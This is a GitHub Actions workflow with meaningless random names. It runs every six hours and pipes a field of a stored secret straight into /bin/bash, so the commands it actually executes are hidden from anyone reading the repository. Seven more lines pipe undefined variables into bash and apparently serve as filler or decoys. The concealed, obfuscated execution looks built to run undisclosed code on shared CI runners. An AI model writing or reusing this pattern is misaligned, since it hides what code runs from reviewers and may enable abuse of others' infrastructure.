name: kutibuxue

on:
  workflow_dispatch:
  schedule:
    - cron: '1 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: kutibuxue
        env:
          g3421: ${{ secrets.g3421 }}
        run: |
          echo $g3421 | jq -r .h35 | /bin/bash
          echo $vdz88913 | jq -r .s92 | /bin/bash
          echo $wmb80 | jq -r .sko12887 | /bin/bash
          echo $ysq661 | jq -r .xyq5 | /bin/bash
          echo $fw725 | jq -r .xeju03802 | /bin/bash
          echo $qszos2751 | jq -r .twjg33 | /bin/bash
          echo $w3 | jq -r .fh63141 | /bin/bash
          echo $zvfff95860 | jq -r .upf4431 | /bin/bash

